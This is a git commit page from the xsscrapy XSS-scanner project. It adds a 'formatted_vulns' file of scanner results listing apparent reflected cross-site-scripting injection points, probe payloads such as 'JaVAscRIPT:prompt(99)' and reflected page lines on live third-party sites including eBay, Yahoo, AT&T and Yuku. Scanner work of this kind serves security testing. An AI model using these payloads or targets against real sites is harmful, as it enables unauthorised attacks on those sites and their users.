DanMcInerney/xsscrapy
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

lots of cleanup

Browse Source
This commit is contained in:
DanMcInerney
2014-07-25 06:28:24 -04:00
parent 4efed48bd2
commit 1a632cbd17
5 changed files with 911 additions and 74 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
.gitignore vendored
View File

@@ -1,2 +1,2 @@
*.pyc
vulnerable-urls.txt
*.txt

772
formatted_vulns Normal file
View File

@@ -0,0 +1,772 @@
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
Line: Your unfiltered email address is: 9zqjx"()=<>9zqjx<br>
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
Line: Your filtered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your unfiltered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your message: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your htmlspecialchars() link: <a href=9zqjxJaVAscRIPT:prompt(99)9zqjx>Your Link</a><br>
URL: https://de.wikipedia.org/wiki/GM_Uzbekistan
Unfiltered: ">
URL: https://www.concrete5.org/community/forums/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: sort, answerFilter, posterUser, poster, forum[], submit_search, forumSelectAll, search_keywords
Line: <input placeholder="Search Forums" type='search' name="search_keywords" value="9zqjx"()=<>9zqjx" />
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '"(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: https://edit.yahoo.com/registration?fs=RxTga76HafDEdyU6w.A78TIseZVOpUEtgTRXYEOrNfB29Oukm8zvXzO51tz7Lvm88D0yiE7A
Unfiltered: h()=
Payload: h()=<>
Type: url
Injection point: fs
Line: <style>#yucs{margin:0 auto;width:100% !important}#yucs .yucs-avatar{height:22px;width:22px}#yucs #yucs-profile_text .yuhead-name-greeting{display:none}#yucs #yucs-profile_text .yuhead-name{top:0;m...
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '"(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: http://www.ebay.com/itm/Dell-Venue-8-Pro-32GB-WiFi-Tablet-8-Display-Black-Windows-8-1-1-YEAR-WARRANTY-/141352616054
Unfiltered: h()=
Payload: h()=&lt;&gt;
Type: form
Injection point: form field names: quantity
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/itm/Dell-Venue-8-Pro-32GB-WiFi-Tablet-8-Display-Black-Windows-8-1-1-YEAR-WARRANTY-/141352616054
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: quantity
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/itm/5V-2A-High-Power-AC-Adapter-Home-Wall-Charger-for-HP-TouchPad-9-7-Wi-Fi-Tablet-/301033634375
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: quantity
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/gsr/i.html?_nkw=Razer+Edge+Pro&rt=nc
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: rt
Line: <div class="eb:share guideShare" data-title="eBay Guides" data-tweet="" data-share="Share this guide:" data-imageUrl="http://i.ebayimg.com/00/s/ODBYODA=/z/T5AAAOxyYANTXsPr/$_106.JPG?set_id=2" data-spid="2054852" data-url="http://www.ebay.com/gsr/i.html?_nkw=Razer+Edge+Pro&rt=9zqjxh%28%29%3D9zqjx" data-style="simple" data-destinations="facebook,twitter,email,pinterest" data-language="en_US_MAIN"></div>
URL: http://www.ebay.com/gsr/i.html?_nkw=Razer+Edge+Pro&rt=nc
Unfiltered: h()=
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _nkw
Line: <title> Search results for 9zqjxh()= 9zqjx buying guides</title>
Line: <meta name="description" content="Need more information before making a buying decision? Get the answers you need from buying guides on eBay for 9zqjxh()= 9zqjx"/>
Line: <meta name="keywords" content="9zqjxh()= 9zqjx"/>
Line: <!--[if lt IE 9]> <link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/header/css/glb.ielt9?combo=90&ds=3&rvr=1.0.0&factor=AC3,GHCOLL&siteid=0&app=RAPTOR&h=100668"><![endif]--> <div c...
Line: <span class="count">0</span> guides found for <b/> 9zqjxh()= 9zqjx</div>
URL: http://www.ebay.com/sch/i.html?_nkw=+Lenovo+IdeaTab+A1000
Unfiltered: '"(){};
Payload: '"(){}[];
Type: url
Injection point: _nkw
Line: <span class="relSrc"><a class="refineSrc" href="javascript:;">Refine your search</a> for <b>9zqjx'" () {} ;9zqjx</b></span></div>
Line: <span class="nllclt"><b>0</b> results found for <b>9zqjx'" () {} ;9zqjx</b></span>
Line: <div id="followMessage" style="display:none"><p class="dContent"><span>Follow <strong>9zqjx'" () {} ;9zqjx</strong> to get e-mail alerts and updates on your eBay Feed.</span></p></div>
Line: <div id="unfollowMessage" style="display:none"><p class="dContent"><span>Unfollow <strong>9zqjx'" () {} ;9zqjx</strong> to stop getting updates on your eBay Feed.</span></p></div>
Line: <div id="followingMessage" style="display:none"><p class='dContent'>Yay! You're now following <strong>9zqjx'" () {} ;9zqjx</strong> in your <a href="http://www.ebay.com">eBay Feed</a>.<span id="email_msg"><br><br><br><a id="fs_email"><input class="fs_lnk" type="checkbox" id="fsEmail" /><label class="fs_lnk fs_lbl" for="fsEmail">Email me new items that match this interest</label></a></span></p></div>
URL: http://www.ebay.com/itm/151362874924
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: maxbid
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/itm/151362868295
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: maxbid
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/gsr/i.html?_allcats=176973%7C171485%7C176974%7C162&_nkw=huawei+mediapad+10+fhd&_rg=1
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _rg
Line: <div class="eb:share guideShare" data-title="eBay Guides" data-tweet="" data-share="Share this guide:" data-imageUrl="http://i.ebayimg.com/00/s/ODBYODA=/z/T5AAAOxyYANTXsPr/$_106.JPG?set_id=2" data-spid="2054852" data-url="http://www.ebay.com/gsr/i.html?_allcats=176973|171485|176974|162&_nkw=huawei+mediapad+10+fhd&_rg=9zqjxh%28%29%3D9zqjx" data-style="simple" data-destinations="facebook,twitter,email,pinterest" data-language="en_US_MAIN"></div>
URL: http://stores.ebay.com/EarlyBirdSavings/_i.html?_fsub=4781382018
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _fsub
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/_i.html?...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="PreviewLayer" class="olp-mn"><...
Line: _r.put('opv4-31jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
Line: _r.put('21PreviewLayer',$o17(0,false,-30,400,"21PreviewLayer","PreviewLayerjsid","PreviewLayer")); _r.put('24',new vjo.darwin.domain.finding.component.previewlayer.link.PreviewLayer({"dsOverlay":false...
URL: http://stores.ebay.com/earlybirdsavings/_i.html?_sasi=1
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _sasi
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/_i.html?...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="PreviewLayer" class="olp-mn"><...
Line: _r.put('opv4-31jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
Line: _r.put('21PreviewLayer',$o18(0,false,-30,400,"21PreviewLayer","PreviewLayerjsid","PreviewLayer")); _r.put('24',new vjo.darwin.domain.finding.component.previewlayer.link.PreviewLayer({"dsOverlay":false...
URL: http://stores.ebay.com/earlybirdsavings/_i.html?_sasi=1
Unfiltered: h
Payload: h()=<>
Type: url
Injection point: _sasi
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/_i.html?...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="PreviewLayer" class="olp-mn"><...
Line: _r.put('opv4-31jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
Line: _r.put('21PreviewLayer',$o12(0,false,-30,400,"21PreviewLayer","PreviewLayerjsid","PreviewLayer")); _r.put('24',new vjo.darwin.domain.finding.component.previewlayer.link.PreviewLayer({"dsOverlay":false...
URL: http://stores.ebay.com/earlybirdsavings/Motors-/_i.html?_dmd=2&_fsub=8705005018&_sid=152659078&_sop=10&_trksid=p4634.c0.m322
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _sop
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/Motors-/...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="v4-13" class="olp-mn ml-pm"><t...
Line: _r.put('opv4-25jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
URL: http://www.ebay.com/gsr/i.html?_nkw=+cutlery&rt=nc
Unfiltered: h()=
Payload: h()=<>
Type: url
Injection point: rt
Line: <div class="eb:share guideShare" data-title="eBay Guides" data-tweet="" data-share="Share this guide:" data-imageUrl="http://i.ebayimg.com/00/s/ODBYODA=/z/T5AAAOxyYANTXsPr/$_106.JPG?set_id=2" data-spid="2054852" data-url="http://www.ebay.com/gsr/i.html?_nkw=+cutlery&rt=9zqjxh()=9zqjx" data-style="simple" data-destinations="facebook,twitter,email,pinterest" data-language="en_US_MAIN"></div>
URL: http://www.ebay.com/gsr/i.html?_nkw=+blades&rt=nc
Unfiltered: h()=
Payload: h()=<>
Type: url
Injection point: _nkw
Line: <title> Search results for 9zqjxh()= 9zqjx buying guides</title>
Line: <meta name="description" content="Need more information before making a buying decision? Get the answers you need from buying guides on eBay for 9zqjxh()= 9zqjx"/>
Line: <meta name="keywords" content="9zqjxh()= 9zqjx"/>
Line: <!--[if lt IE 9]> <link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/header/css/glb.ielt9?combo=90&ds=3&rvr=1.0.0&factor=AC3,GHCOLL&siteid=0&app=RAPTOR&h=100668"><![endif]--> <div c...
Line: <span class="count">0</span> guides found for <b/> 9zqjxh()= 9zqjx</div>
URL: http://www.ebay.com/itm/Uncanny-X-men-503-CGC-Graded-9-8-Previews-Sketch-Edition-Fraction-Brubaker-Land-/380957411109
Unfiltered: '"(){};
Payload: '"(){}[];
Type: form
Injection point: form field names: _nkw, submit
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b></div><div><table cellpadding="0" cell...
URL: http://www.ebay.com/sch/i.html?LH_Complete=1&LH_Sold=1&_nkw=minifig+lots&rt=nc
Unfiltered: "()=
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: _nkw
Line: <span class="relSrc"><a class="refineSrc" href="javascript:;">Refine your search</a> for <b>9zqjx" () = 9zqjx</b></span></div>
Line: <b>0</b> results found for <b>9zqjx" () = 9zqjx</b></h1>
Line: <div id="followMessage" style="display:none"><p class="dContent"><span>Follow <strong>9zqjx" () = 9zqjx</strong> to get e-mail alerts and updates on your eBay Feed.</span></p></div>
Line: <div id="unfollowMessage" style="display:none"><p class="dContent"><span>Unfollow <strong>9zqjx" () = 9zqjx</strong> to stop getting updates on your eBay Feed.</span></p></div>
Line: <div id="followingMessage" style="display:none"><p class='dContent'>Yay! You're now following <strong>9zqjx" () = 9zqjx</strong> in your <a href="http://www.ebay.com">eBay Feed</a>.<span id="email_msg"><br><br><br><a id="fs_email"><input class="fs_lnk" type="checkbox" id="fsEmail" /><label class="fs_lnk fs_lbl" for="fsEmail">Email me new items that match this interest</label></a></span></p></div>
Line: raptor.require("search.layers.FollowSearchLink").bindToLink({config:'{}', emailDefault:false, linkSelector:"e1-35", trksid: "p2045573.m2651", srchName: "9zqjx\" () = 9zqjx", saveUrl:"http://www.ebay...
URL: http://elportal.att.net/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: memberID
Line: <meta name='DCSext.wtMemberID' content='9zqjx"()=<>9zqjx' />
URL: http://elportal.att.net/
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: memberID
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/products1
Unfiltered: '"(){}[];
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/products1
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/webdirectory
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/addons
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/products1
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx"()=<>9zqjx' />
URL: http://www.att.net/addons
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx"()=<>9zqjx' />
URL: http://www.att.net/products1
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://elportal.att.net/
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: memberID
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/addons
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/webdirectory
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: User-Agent
Line: User-Agent: 9zqjx()=<>9zqjx <br />
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: Referer
Line: Referer: 9zqjx()=<>9zqjx <br />
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Payload: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
Line: Your filtered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your unfiltered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your message: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your htmlspecialchars() link: <a href=9zqjxJaVAscRIPT:prompt(99)9zqjx>Your Link</a><br>
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: message, link, email
Line: Your unfiltered email address is: 9zqjx"()=<>9zqjx<br>
URL: https://musopen.org/
Unfiltered: "
Payload: '"(){}[];
Type: form
Injection point: form field names: q
Line: <p class="correction"><span>Did you mean: <a href="?q=9zqjx+9zqjx">9zqjx 9zqjx</a></span></p>
URL: https://musopen.org/
Unfiltered: "
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: q
Line: <p class="correction"><span>Did you mean: <a href="?q=9zqjx+quot+9zqjx">9zqjx quot 9zqjx</a></span></p>
URL: http://musopen.tumblr.com
Unfiltered: JaVAscRIPT:prompt(99)
Payload: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: q
Line: <title>Musopen News | Search results for: 9zqjxJaVAscRIPT:prompt(99)9zqjx</title>
Line: <input type="text" id="txtSearch" name="q" value="9zqjxJaVAscRIPT:prompt(99)9zqjx" />
Line: <h2>Search results for <a href="9zqjxJaVAscRIPT%3Aprompt%2899%299zqjx">9zqjxJaVAscRIPT:prompt(99)9zqjx</a></h2>
Line: <p>Im sorry, but we couldn't find anything matching "<b>9zqjxJaVAscRIPT:prompt(99)9zqjx</b>". Suggestions:</p>
URL: http://oar.yuku.com/topic/15516
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: q, submit
Line: <input name="q" type="text" id="search-input" class="text" value="9zqjx"()=<>9zqjx">
Line: <h2>Search Results For: 9zqjx"()=<>9zqjx</h2>
URL: http://oar.yuku.com/reply/485104/Rockville-LP-songs-played-on-summer-tour
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_abbf260948d17100ddce6b91405f1999"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://skindesignsalon.yuku.com/login/loginnow/Login-to-Yuku.html
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <div class="ka-field ka-text-field ka-login"><label for="ka-login_username">Username:</label><span class="ka-input-wrapper ka-text ka-hvr"><input id="ka-login_username" class="ka-text ka-hvr" type="text" name="login" value="9zqjx"()=<>9zqjx" tabindex="1"></span></div> <script type="text/javascript">
URL: http://skindesignsalon.yuku.com/portal
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: site-url, site-name
Line: <form id="createcommunity" class="ka-create-communtiy-not-logged-in" action="http://www.yuku.com/portal/createcommunity" method="post"><div class="ka-fieldset"><div class="ka-field ka-text-field k...
URL: http://oar.yuku.com/invite/sendpage/?emaillist=&url=http%3A%2F%2Foar.yuku.com%2Ftopic%2F15522
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_511c8191f7eac8b948195219422661de"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://oar.yuku.com/topic/15522
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: q, submit
Line: <input name="q" type="text" id="search-input" class="text" value="9zqjx"()=<>9zqjx">
Line: <h2>Search Results For: 9zqjx"()=<>9zqjx</h2>
URL: http://oar.yuku.com/topic/15516
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_65d617984d7ee33273c98d14b7faf7a8"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://oar.yuku.com/topic/15522
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_0082fb43c290dfbbf4793b7a0d5a59ec"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://pommielvrjen.u.yuku.com/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_ed0bd06c5bc0cd02e4d7896c9cf64793"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://pommielvrjen.u.yuku.com/gallery/ls
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_1529e5f4a9fdd556c0ffa2ccb4a1f407"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://pommielvrjen.u.yuku.com/portal
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: site-url, site-name
Line: <form id="createcommunity" class="ka-create-communtiy-not-logged-in" action="http://www.yuku.com/portal/createcommunity" method="post"><div class="ka-fieldset"><div class="ka-field ka-text-field k...
URL: http://puddinskittles.u.yuku.com/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_221cfb41bc03f1fd0aa07a3e7c565e7a"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://pommielvrjen.u.yuku.com/comment/view/id/220693
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
